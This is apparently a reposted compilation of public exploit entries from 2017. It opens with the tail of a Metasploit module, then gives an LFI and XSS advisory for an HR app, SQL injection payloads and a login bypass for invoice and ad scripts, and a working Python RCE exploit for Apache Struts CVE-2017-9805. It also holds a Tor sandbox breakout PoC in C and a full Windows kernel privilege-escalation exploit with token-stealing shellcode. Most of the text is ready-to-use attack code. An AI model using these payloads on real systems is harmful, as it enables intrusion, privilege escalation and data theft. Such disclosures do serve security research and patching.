        sploit = make_packet(i, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28)
        sock.put(sploit)
        if validate_response(sock.get_once)
          next
        end
        sleep(0.1)
        break
      rescue EOFError
        print_status('Invalid')
      end
    end
    handler
    disconnect
  end
end
HireHackking 
# Exploit Title: HRM - Workable Zone : Ultimate HR System <= 1.2 - Unauthenticated Directory Traversal / Stored XSS
# Date: 2017-09-05
# Exploit Author: 8bitsec
# Vendor Homepage: http://workablezone.com
# Software Link: https://codecanyon.net/item/hrm-workable-zone-ultimate-hr-system/20182372
# Version: 1.2
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-05

Product & Service Introduction:
===============================
Workable Zone is probably one of most customizable Human resourse(HR) management software for companies of all sizes.

Technical Details & Description:
================================

Multiple Stored XSS vulnerabilities found.

Directory Traversal vulnerability can disclose sensitive files.

Proof of Concept (PoC):
=======================

Stored XSS:

Logged as Employee:

Write your payload on:
Profile > Last Name

Other vulnerable fields include: First Name, Contact Number

Unauthenticated Directory Traversal:

http://localhost.com/download?type=document&filename=../../../../../etc/passwd

Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
HireHackking 
# # # # # 
# Exploit Title: Online Invoice System 3.0 - SQL Injection
# Dork: N/A
# Date: 07.09.2017
# Vendor Homepage: http://www.onlineinvoicesystem.com/
# Software Link: http://www.onlineinvoicesystem.com/index_v3.html
# Demo: http://www.onlineinvoicesystem.com/onlineinvoicesystem3/index.php
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# Bypass
# http://localhost/[PATH]/index.php
# User: 'or 1=1 or ''=' Pass: anything
# User: anything Pass: 'or 1=1 or ''='
# 
# Sql
# http://localhost/[PATH]/editclient.php?cid=[SQL]
# -5+/*!00003uNiOn*/(/*!00003SelECt*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER()),/*!50000CONCAT_WS*/(0x203a20,DATABASE()),/*!50000CONCAT_WS*/(0x203a20,VERSION()),0x283529,(/*!50000SelECt*/+export_set(5,@:=0,(SelECt+CoUnt(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629)--+-
# 
# http://localhost/[PATH]/admin_invoice_print.php?id=[SQL]
# 
# http://localhost/[PATH]/edit_invoice.php?id=[SQL]
# 
# http://localhost/[PATH]/admin_invoice.php?id=[SQL]
# Etc...
# # # # #
HireHackking 
# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
# Google Dork: filetype:action
# Date: 06/09/2017
# Exploit Author: Warflop
# Vendor Homepage: https://struts.apache.org/
# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
# Version: Struts 2.5 – Struts 2.5.12
# Tested on: Struts 2.5.10
# CVE : 2017-9805

#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# Struts CVE-2017-9805 Exploit
# Warflop (http://securityattack.com.br/)
# Greetz: Pimps & G4mbl3r
# *****************************************************
import requests
import sys

def exploration(command):

	exploit = '''
				<map>
				<entry>
				<jdk.nashorn.internal.objects.NativeString>
				<flags>0</flags>
				<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
				<dataHandler>
				<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
				<is class="javax.crypto.CipherInputStream">
				<cipher class="javax.crypto.NullCipher">
				<initialized>false</initialized>
				<opmode>0</opmode>
				<serviceIterator class="javax.imageio.spi.FilterIterator">
				<iter class="javax.imageio.spi.FilterIterator">
				<iter class="java.util.Collections$EmptyIterator"/>
				<next class="java.lang.ProcessBuilder">
				<command>
				<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>
				</command>
				<redirectErrorStream>false</redirectErrorStream>
				</next>
				</iter>
				<filter class="javax.imageio.ImageIO$ContainsFilter">
				<method>
				<class>java.lang.ProcessBuilder</class>
				<name>start</name>
				<parameter-types/>
				</method>
				<name>foo</name>
				</filter>
				<next class="string">foo</next>
				</serviceIterator>
				<lock/>
				</cipher>
				<input class="java.lang.ProcessBuilder$NullInputStream"/>
				<ibuffer/>
				<done>false</done>
				<ostart>0</ostart>
				<ofinish>0</ofinish>
				<closed>false</closed>
				</is>
				<consumed>false</consumed>
				</dataSource>
				<transferFlavors/>
				</dataHandler>
				<dataLen>0</dataLen>
				</value>
				</jdk.nashorn.internal.objects.NativeString>
				<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
				</entry>
				<entry>
				<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
				<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
				</entry>
				</map>
				'''


	url = sys.argv[1]

	headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
			'Content-Type': 'application/xml'}

	request = requests.post(url, data=exploit, headers=headers)
	print (request.text)

if len(sys.argv) < 3:
	print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
	print ('[*] Warflop - http://securityattack.com.br')
	print ('[*] Greatz: Pimps & G4mbl3r')
	print ('[*] Use: python struts2.py URL COMMAND')
	print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
	exit(0)
else:
	exploration(sys.argv[2])
HireHackking 
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1293&desc=2

**EDIT: I mixed up two different sandboxes; see the comment below for a correction.**

From inside the Linux sandbox described in
<https://blog.torproject.org/blog/tor-browser-70-released>, it is
still possible to talk to the X server without any restrictions.
This means that a compromised browser can e.g. use the
XTEST X protocol extension
(<https://www.x.org/releases/X11R7.7/doc/xextproto/xtest.html>) to
fake arbitrary keyboard and mouse events, directed at arbitrary
windows. This permits a sandbox breakout, e.g. by injecting keypresses
into a background window.

<https://trac.torproject.org/projects/tor/wiki/doc/TorBrowser/Sandbox/Linux#HowdoIprotectmyselffromXexploits>
mentions that the X server is reachable, but it sounds like the author
didn't realize that a normal connection to the X server permits
sandbox breakouts by design.

To reproduce:

Install Debian Jessie with the Xfce4 desktop environment and with
backports enabled.
Install bubblewrap and xdotool.
Install the sandboxed Tor browser from
<https://www.torproject.org/dist/torbrowser/7.0a4/sandbox-0.0.6-linux64.zip>.
Launch the sandboxed Tor browser, use the default configuration. When
the browser has launched, close it.
Delete ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.
Store the following as ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.c:

=========================
*/
#include <stdlib.h>
#include <unistd.h>

int main(void){
  int status;
  setenv("LD_LIBRARY_PATH", "/home/amnesia/sandboxed-tor-browser/tor-browser", 1);
  if (fork() == 0) {
    execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "key", "alt+F2", "sleep", "1", "type", "xfce4-terminal", NULL);
    perror("fail");
    return 0;
  }
  wait(&status);
  if (fork() == 0) {
    execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", "sleep", "1", "type", "id", NULL);
    perror("fail");
    return 0;
  }
  wait(&status);
  if (fork() == 0) {
    execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", NULL);
    perror("fail");
    return 0;
  }
  wait(&status);
  while (1) sleep(1000);
  return 0;
}

/*
=========================

In ~/.local/share/sandboxed-tor-browser/tor-browser/Browser, run
"gcc -static -o firefox firefox.c".
Run "cp /usr/bin/xdotool /usr/lib/x86_64-linux-gnu/* ~/.local/share/sandboxed-tor-browser/tor-browser/".
Now run the launcher for the sandboxed browser again. Inside the
sandbox, the new firefox binary will connect to the X11 server and
send fake keypresses to open a terminal outside the sandbox and type
into it.

There are probably similar issues with pulseaudio when it's enabled;
I suspect that it's possible to e.g. use the pulseaudio socket to load
pulseaudio modules with arbitrary parameters, which would e.g. permit
leaking parts of files outside the sandbox by using them as
authentication cookie files for modules that implement audio streaming
over the network.


###################################################################

I mixed up two sandboxes.

The blog post <https://blog.torproject.org/blog/tor-browser-70-released> talks about the Firefox content process sandbox, which is still in development and unrelated to the Tor-specific sandbox I looked at. So the "content sandboxing" the blog post talks about isn't very effective yet; the Mozilla wiki points to multiple bug lists that document the remaining work (https://wiki.mozilla.org/Security/Sandbox#Bug_Lists).

The sandbox I looked at here is written and distributed by the Tor Project.


https://gitweb.torproject.org/tor-browser/sandboxed-tor-browser.git/commit/?id=1bfbd7cc1cd60c9468f2e33a3d4816973f1fb2f5 was added to mitigate the issue I reported by filtering X11 traffic and whitelisting permitted X protocol extensions.

More warnings have been added to the corresponding documentation (https://trac.torproject.org/projects/tor/wiki/doc/TorBrowser/Sandbox/Linux?action=diff&version=23&old_version=21) that point out that this sandbox should not be used without manually configuring nested X11 and that pulseaudio is unsafe.
*/
HireHackking 
# -*- coding: utf-8 -*-
"""
Jungo DriverWizard WinDriver Kernel Out-of-Bounds Write Privilege Escalation Vulnerability

Download: http://www.jungo.com/st/products/windriver/
File:     WD1240.EXE
Sha1:     3527cc974ec885166f0d96f6aedc8e542bb66cba
Driver:   windrvr1240.sys
Sha1:     0f212075d86ef7e859c1941f8e5b9e7a6f2558ad
CVE:      CVE-2017-14075
Author:   Steven Seeley (mr_me) of Source Incite
Affected: <= v12.4.0
Thanks:   b33f and sickness

Summary:
========

This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 

The specific flaw exists within the processing of IOCTL 0x953824a7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in an out-of-bounds write condition. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.

Vulnerability:
==============

The vulnerability occurs in sub_405644 at loc_4056CD:

.text:004056CD loc_4056CD:                                     ; CODE XREF: sub_405644+6A
.text:004056CD                 mov     eax, [ebx]
.text:004056CF                 xor     edx, edx
.text:004056D1                 mov     byte ptr [edi+eax], 0   ; null byte write
.text:004056D5                 mov     eax, P
.text:004056DA                 add     [eax+880h], edi         ; offset HalDispatchTable[1]+0x880 is null and writable

Exploitation:
=============

At 0x004056da there is a second write, but since HalDispatchTable[1]+0x880 points to a null dword that is in a writable location, no memory is modified outside of out null byte write (0x004056d1).

Since we can do that, we can keep calling the vuln ioctl code and push down the kernel pointer from HalDispatchTable[1] to reach userland. We could have just done 2 bytes, but I choose 3 for reliability.

Finally, the shellcode repairs the HalDispatchTable[1] pointer by reading HalDispatchTable[2] and calculating the offset to the HalDispatchTable[1] pointer and then re-writes the correct pointer back into the HalDispatchTable.

Timeline:
=========

2017-08-22 – Verified and sent to Jungo via sales@/first@/security@/info@jungo.com
2017-08-25 – No response from Jungo and two bounced emails
2017-08-26 – Attempted a follow up with the vendor via website chat
2017-08-26 – No response via the website chat
2017-09-03 – Recieved an email from a Jungo representative stating that they are "looking into it"
2017-09-03 – Requested a timeframe for patch development and warned of possible 0day release
2017-09-06 – No response from Jungo
2017-09-06 – Public 0day release of advisory

Example:
========

C:\Users\Guest\Desktop>icacls poc.py
poc.py NT AUTHORITY\Authenticated Users:(I)(F)
       NT AUTHORITY\SYSTEM:(I)(F)
       BUILTIN\Administrators:(I)(F)
       BUILTIN\Users:(I)(F)
       Mandatory Label\Low Mandatory Level:(I)(NW)

Successfully processed 1 files; Failed processing 0 files

C:\Users\Guest\Desktop>whoami
debugee\guest

C:\Users\Guest\Desktop>poc.py

        --[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]
                       Steven Seeley (mr_me) of Source Incite

(+) spraying pool with mixed objects...
(+) sprayed the pool!
(+) making pool holes...
(+) made the pool holes!
(+) allocating shellcode...
(+) allocated the shellcode!
(+) triggering pool overflow...
(+) allocating pool overflow input buffer
(+) elevating privileges!
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Guest\Desktop>whoami
nt authority\system

C:\Users\Guest\Desktop>
"""
import os
import sys
import struct
from ctypes import *
from ctypes.wintypes import *
from platform import release, architecture

kernel32 = windll.kernel32
ntdll = windll.ntdll

# GLOBAL VARIABLES
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS = 0

class SYSTEM_MODULE_INFORMATION(Structure):
    _fields_ = [("Reserved", c_void_p * 3), # this has an extra c_void_p because the first 4 bytes = number of return entries.
                ("ImageBase", c_void_p),    # it's not actually part of the structure, but we are aligning it.
                ("ImageSize", c_ulong),
                ("Flags", c_ulong),
                ("LoadOrderIndex", c_ushort),
                ("InitOrderIndex", c_ushort),
                ("LoadCount", c_ushort),
                ("ModuleNameOffset", c_ushort),
                ("FullPathName", c_char * 256)]

def alloc_shellcode(base, input_size, HalDispatchTable1):
    """ 
    allocates some shellcode
    """
    print "(+) allocating shellcode @ 0x%x" % base
    baseadd = c_int(base)
    size    = c_int(input_size)

    # get the repair address
    HalDispatchTable2 = struct.pack("<I", HalDispatchTable1+0x4)
    
    # --[ setup]
    input  = "\x60"                      # pushad
    input += "\x64\xA1\x24\x01\x00\x00"  # mov eax, fs:[KTHREAD_OFFSET]
    input += "\x8B\x40\x50"              # mov eax, [eax + EPROCESS_OFFSET]
    input += "\x89\xC1"                  # mov ecx, eax (Current _EPROCESS structure)
    input += "\x8B\x98\xF8\x00\x00\x00"  # mov ebx, [eax + TOKEN_OFFSET]
    # --[ copy system PID token]
    input += "\xBA\x04\x00\x00\x00"      # mov edx, 4 (SYSTEM PID)
    input += "\x8B\x80\xB8\x00\x00\x00"  # mov eax, [eax + FLINK_OFFSET] <-|
    input += "\x2d\xB8\x00\x00\x00"      # sub eax, FLINK_OFFSET           |
    input += "\x39\x90\xB4\x00\x00\x00"  # cmp [eax + PID_OFFSET], edx     |
    input += "\x75\xed"                  # jnz                           ->|
    input += "\x8B\x90\xF8\x00\x00\x00"  # mov edx, [eax + TOKEN_OFFSET]
    input += "\x89\x91\xF8\x00\x00\x00"  # mov [ecx + TOKEN_OFFSET], edx
    # --[ recover]
    input += "\xbe" + HalDispatchTable2  # mov esi, HalDispatchTable[2]
    input += "\x8b\x16"                  # mov edx, [esi]
    input += "\x81\xea\x12\x09\x00\x00"  # sub edx, 0x912
    input += "\x83\xee\x04"              # sub esi, 0x4
    input += "\x89\x16"                  # mov [esi], edx
    input += "\x61"                      # popad
    input += "\xC3"                      # ret

    input += "\xcc" * (input_size-len(input))
    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, 
                                              POINTER(c_int), c_int, c_int]
    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, 
                                             byref(size), 
                                             MEM_RESERVE|MEM_COMMIT,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
        return False
    written = c_ulong()
    write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))
    if write == 0:
        print "(-) Error while writing our input buffer memory: %s" % write
        return False
    return True

def alloc(base, input_size):
    """
    Just allocates things.
    """
    baseadd   = c_int(base)
    size = c_int(input_size)
    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, 
                                              POINTER(c_int), c_int, c_int]
    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, 
                                             byref(size), 
                                             MEM_RESERVE|MEM_COMMIT,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
        return False
    return True

def mymemset(base, location, size):
    """
    A cheap memset ¯\_(ツ)_/¯
    """
    input = location * (size/len(location))
    written = c_ulong()
    
    write = kernel32.WriteProcessMemory(0xFFFFFFFF, base, input, len(input), byref(written))
    if write == 0:
        print "(-) Error while writing our input buffer memory: %s" % write
        return False
    return True

def get_HALDispatchTable_kernel_address():
    """
    This function gets the HALDispatchTable's kernel address
    """
    # allocate arbitrary buffer and call NtQuerySystemInformation
    b = create_string_buffer(0)
    systeminformationlength = c_ulong(0)
    res = ntdll.NtQuerySystemInformation(11, b, len(b), byref(systeminformationlength))

    # call NtQuerySystemInformation second time with right size
    b = create_string_buffer(systeminformationlength.value)
    res = ntdll.NtQuerySystemInformation(11, b, len(b), byref(systeminformationlength))

    # marshal raw bytes for 1st entry
    smi = SYSTEM_MODULE_INFORMATION()
    memmove(addressof(smi), b, sizeof(smi))

    # get kernel image name
    kernelImage = smi.FullPathName.split('\\')[-1]
    print "(+) found %s kernel base address: 0x%x" % (kernelImage, smi.ImageBase)

    # load kernel image in userland and get HAL Dispatch Table offset
    hKernelImage = kernel32.LoadLibraryA(kernelImage)
    print "(+) loading %s in userland" % kernelImage
    print "(+) found %s Userland Base Address : 0x%x" % (kernelImage, hKernelImage)
    hdt_user_address = kernel32.GetProcAddress(hKernelImage,"HalDispatchTable")
    print "(+) found HalDispatchTable userland base address: 0x%x" % hdt_user_address

    # calculate HAL Dispatch Table offset in kernel land
    hdt_kernel_address = smi.ImageBase + ( hdt_user_address - hKernelImage)
    print "(+) found HalDispatchTable kernel base address: 0x%x" % hdt_kernel_address
    return hdt_kernel_address
 
def write_one_null_byte(HWD, in_buffer, location):
    """
    The primitive function
    """
    mymemset(in_buffer, location, 0x1000)
    if HWD:
        IoStatusBlock = c_ulong()
        dev_ioctl = ntdll.ZwDeviceIoControlFile(HWD,
                                       None,
                                       None,
                                       None,
                                       byref(IoStatusBlock),
                                       0x953824a7,                  # target
                                       in_buffer,                   # special buffer
                                       0x1000,                      # just the size to trigger with
                                       0x20000000,                  # whateva
                                       0x1000                       # whateva
                                       )
        # we could check dev_ioctl here I guess
        return True
    return False

def we_can_elevate(h, in_buffer, base):
    """
    This just performs the writes...
    """

    # get location of first byte write
    where2write = struct.pack("<I", base + 0x3)
    print "(+) triggering the first null byte write..."
    if write_one_null_byte(h, in_buffer, where2write):

        # get the location of the second byte write
        where2write = struct.pack("<I", base + 0x2)
        print "(+) triggering the second null byte write..."
        if write_one_null_byte(h, in_buffer, where2write):
    
            # get the location of the third byte write
            where2write = struct.pack("<I", base + 0x1)
            print "(+) triggering the third null byte write..."
            if write_one_null_byte(h, in_buffer, where2write):

                # eop
                print "(+) calling NtQueryIntervalProfile to elevate"
                arb = c_ulong(0)
                ntdll.NtQueryIntervalProfile(0x1337, byref(arb))
                return True
    return False

def main():
    print "\n\t--[ Jungo DriverWizard WinDriver Kernel Write EoP exploit ]"
    print "\t               Steven Seeley (mr_me) of Source Incite\r\n"
    if release() != "7" and architecture()[0] == "32bit":
        print "(-) this exploit will only work for Windows 7 x86."
        print "    patch the shellcode for other windows versions."
        sys.exit(-1)

    print "(+) attacking target WinDrvr1240"
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3

    DEVICE_NAME   = "\\\\.\\WinDrvr1240"
    dwReturn      = c_ulong()
    h = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)

    # get the second HalDispatchTable entry[0]
    base = get_HALDispatchTable_kernel_address() + 0x4

    # create some shellcode that patches the HalDispatchTable[1]
    if not alloc_shellcode(0x000000a2, 0x1000, base):
        print "(-) cannot allocate shellcode"
        sys.exit(-1)

    # alloc some memory
    in_buffer = 0x41414141
    in_size   = 0x1000
    if not alloc(in_buffer, 0x1000):
        print "(-) cannot allocate target buffer"
        sys.exit(-1)

    if we_can_elevate(h, in_buffer, base):
        os.system('cmd.exe')
    else:
        print "(-) exploit failed!"

if __name__ == '__main__':
    main()
HireHackking 
# # # # # 
# Exploit Title: Pay Banner Text Link Ad 1.0.6.1 - SQL Injection
# Dork: N/A
# Date: 06.09.2017
# Vendor Homepage: http://www.dijiteol.com/
# Software Link: http://www.dijiteol.com/p-Pay-Banner-Textlink-Ad-Pay-Banner-Advertisement-PHP-Script-i-1.html
# Demo: http://dijiteol.com/demos/pbtla
# Version: 1.0.6.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an users to inject sql commands....
# 
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?action=stats&id=[SQL]
# 
# http://localhost/[PATH]/index.php?action=previewad&id=[SQL]
# 
# Etc..
# # # # #